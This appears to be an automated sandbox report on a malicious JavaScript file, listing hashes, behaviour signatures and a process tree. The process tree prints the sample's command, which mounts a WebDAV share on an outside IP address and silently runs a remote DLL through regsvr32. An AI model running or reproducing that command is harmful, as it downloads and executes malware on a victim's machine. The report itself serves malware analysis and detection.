Analysis

  • max time kernel
    138s
  • max time network
    104s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/07/2024, 06:18

General

  • Target

    72461564513861862.js

  • Size

    5KB

  • MD5

    a2c274a96d3c6753f76d92d06deea5cc

  • SHA1

    76ce1a3fa13c403981c871a236cac0fbeac0ab11

  • SHA256

    9340c8fc143631729d0f85e3ba18646e3fe53bba96c4372226bc39bfdf9fde24

  • SHA512

    d1f5f555bfb0c8c7e52d498d0ad1512f881d66286a4e11076857225962cb6e08d2e12fdc1122ce132dc9532e26ea1db09ce4895feb2e03dea155004b501cd630

  • SSDEEP

    48:CNbFDmFFWJUWe5JKZdKW+YMTDyrP7wIILuX/jIDIjXFTmIcmN06jX0uPjdcchKbX:q9uv5cLIf7aAkl7a7T

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Runs net.exe
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\72461564513861862.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1440
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\2281447412409.dll
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1352
      • C:\Windows\system32\net.exe
        net use \\45.9.74.36@8888\davwwwroot\
        3⤵
          PID:1764

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads